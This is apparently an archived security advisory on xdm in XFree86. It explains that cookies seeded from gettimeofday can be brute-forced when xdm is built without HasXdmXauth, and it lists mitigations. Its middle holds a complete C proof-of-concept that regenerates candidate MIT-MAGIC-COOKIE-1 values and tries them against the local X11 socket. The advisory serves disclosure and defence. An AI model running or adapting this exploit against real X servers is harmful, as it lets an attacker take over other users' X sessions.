COMMAND

    xdm

SYSTEMS AFFECTED

    XFree

PROBLEM

    Cyril  Diakhate  found  following.   Current  versions  of xdm are
    sensitive to  trivial brute  force attack  if it  is compiled with
    bad options, mainly HasXdmXauth.

    Without this option, cookie is generated from gettimeofday(2).  If
    you know starting  time of xdm  login session, computation  of the
    coookie just takes a few seconds.

    Necessary conditions for the bug to be exploited:
    - have access to X11 socket (TCP or UNIX);
    - know starting date of xdm login session;
    - no  need for  big computation  power (pentium  200MHz should  be
      enough).

    Drawbacks due to exploitation of the bug:
    - victim's X server consumes much system resource;
    - many X server configurations let it generate many logs entries.

    Since  xdm  is  dynamically  linked,  there's  no  issue on export
    restriction out- side US for  this binary distribution of xdm:  it
    does not contain the DES encryption code.  So it's now included in
    the bin package.

    X11 code:

        void
        GenerateAuthData (char *auth, int len)
        {
            long            ldata[2];

        #ifdef ITIMER_REAL
            {
                struct timeval  now;

                X_GETTIMEOFDAY (&now);
                ldata[0] = now.tv_usec;
                ldata[1] = now.tv_sec;
            }
        #else
            {
        #ifndef __EMX__
                long    time ();
        #endif

                ldata[0] = time ((long *) 0);
                ldata[1] = getpid ();
            }
        #endif
        #ifdef HASXDMAUTH
            {
                int                 bit;
                int                 i;
                auth_wrapper_schedule    schedule;
                unsigned char       data[8];
                static int          xdmcpAuthInited;

                longtochars (ldata[0], data+0);
                longtochars (ldata[1], data+4);
                if (!xdmcpAuthInited)
                {
                    InitXdmcpWrapper ();
                    xdmcpAuthInited = 1;
                }
                _XdmcpAuthSetup (key, schedule);
                for (i = 0; i < len; i++) {
                    auth[i] = 0;
                    for (bit = 1; bit < 256; bit <<= 1) {
                        _XdmcpAuthDoIt (data, data, schedule, 1);
                        if ((data[0] + data[1]) & 0x4)
                            auth[i] |= bit;
                    }
                }
            }
        #else
            {
                int         seed;
                int         value;
                int         i;

                seed = (ldata[0]) + (ldata[1] << 16);
                xdm_srand (seed);
                for (i = 0; i < len; i++)
                {
                    value = xdm_rand ();
                    auth[i] = (value & 0xff00) >> 8;
                }
                value = len;
                if (value > sizeof (key))
                    value = sizeof (key);
                memmove( (char *) key, auth, value);
            }
        #endif
        }

    Proof of the concept (to be adapted depending on your version):

    /*
    ** xdm-cookie-exploit.c
    **
    ** Made by (ntf & sky)
    ** Login    <ntf@epita.fr>, <sky@epita.fr>
    **
    ** Last update Sun Jun 24 21:38:48 2001 root
    */
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/socket.h>
    #include <sys/un.h>

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <time.h>
    #include <X11/Xmd.h>
    #include <X11/X.h>
    #include <signal.h>

    void doit(struct timeval t);
    void die(char *perror_msg); /* TODO: terminal function */

    #define COOKIE_SZ 16
    #define TRUE  42

    struct  s_x11_hdr
    {
      char  endian;
      char  pad1;
      CARD16 protocol_major_version;
      CARD16 protocol_minor_version;
      CARD16 authorization_protocol_name_length;
      CARD16 authorization_protocol_data_length;
      CARD16 pad2;
      char  authorization_protocol_name[20];
      char  authorization_protocol_data[16];
    };

    static unsigned  long int next = 1;
    static unsigned int  total = 0;

    void on_sigint(int sig)
    {
      printf("total: %d\n", total);
    }

    int main(ac,av)
    int ac;
    char *av[];
    {
      struct timeval t;

      if (ac < 3)
        {
          fprintf (stderr, "%s: usage time_insec time_inusec\n", av[0]);
          exit (4);
        }
      t.tv_sec = atoi(av[1]);
      t.tv_usec = atoi(av[2]);
      printf("sec == %lu\nusec == %lu\n", t.tv_sec, t.tv_usec);
      doit(t);
      return (0);
    }



    static int inline xdm_rand(void)
    {
        next = next * 1103515245 + 12345;
        return (unsigned int)(next / 65536) % 32768;
    }

    void print_cookie(unsigned char cookie[COOKIE_SZ])
    {
      int i;

      printf("cookie=");
      for (i = 0; i < COOKIE_SZ; i++)
        printf("%02x", cookie[i]);
      printf("\n");
    }


    void  doit(t)
    struct timeval t;
    {
      unsigned char  cookie[COOKIE_SZ];
      long   ldata[2];
      struct sockaddr_un addr;
      char   buffer[1024];
      struct s_x11_hdr x11hdr;

      ldata[0] = t.tv_usec;
      ldata[1] = t.tv_sec;
      total = 0;
      x11hdr.endian = 'l';
      x11hdr.protocol_major_version = X_PROTOCOL;
      x11hdr.protocol_minor_version = X_PROTOCOL_REVISION;
      x11hdr.authorization_protocol_name_length = 18;
      x11hdr.authorization_protocol_data_length = 16;
      bcopy("MIT-MAGIC-COOKIE-1", x11hdr.authorization_protocol_name, 18);
      for (total = 0; TRUE; total++)
        {
          int fd;
          int i;

          if (!ldata[0])
     ldata[1]--;
          ldata[0]--;
          if ((fd = socket(PF_LOCAL, SOCK_STREAM, 0)) == -1)
     die("socket");
          memset(&addr, 0, sizeof(addr));
          addr.sun_family = AF_LOCAL;
          strcpy(addr.sun_path, "/tmp/.X11-unix/X0");
          if ((connect(fd, (struct sockaddr*)&addr, sizeof(addr))) == -1)
     die("connect");
          next = (ldata[0]) + (ldata[1] << 16);
          for (i = 0; i < 16; i++)
     cookie[i] = (xdm_rand() & 0xff00) >> 8;
          bcopy(cookie, x11hdr.authorization_protocol_data, 16);
          if (write(fd, &x11hdr, sizeof(x11hdr)) == -1)
     die("write");
          if (read(fd, buffer, sizeof(buffer)) == -1)
     die("read");
          if (buffer[0])
     {
       printf("SUCCESS: ");
       print_cookie(cookie);
       exit(0);
     }
          if (!(total % 1000))
     {
       printf(".");
       fflush(stdout);
     }
          close(fd);
        }
      exit(42);
    }

    void die(str)
    char *str;
    {
      perror(str);
      exit(4);
    }

    Exploitation of this bug  needs local access, remote  exploitation
    is possible but far much  difficult and we didn't post  the remote
    version.

SOLUTION

    - use  good compilation  options (compile  xdm with  "HasXdmXauth"
      option activated)
    - limit  access to  X11 sockets  (start X  server with  "-nolisten
      tcp"...)

    However the  file xc/lib/Xdmcp/WrapHelp.c  is not  included in the
    XFree86-3.3  source,  so  support  for  XDM-AUTHORIZATION-1 is not
    included here.   You'll have  to get  WrapHelp.c and  rebuild  xdm
    after having set HasXdmAuth in xf86site.def.

    The file is available within the US; for details see

        ftp.x.org:/pub/R6/xdm- auth/README

    Some vendors  (NetBSD, SuSE...)  already have  a solution  (NetBSD
    1.5, SuSE 6.3 and  + on i386, ia64,  ppc, s390 and sparc...)   The
    supported SuSE Linux distributions  (6.3 and later) for  the i386,
    ia64, ppc,  s390 and  sparc distributions  do have  the Wraphelp.c
    code as well  as the HasXdmAuth  option defined and  are therefore
    not vulnerable to the attack.  The AXP Alpha distributions however
    do _not_ contain the enhanced authentication scheme.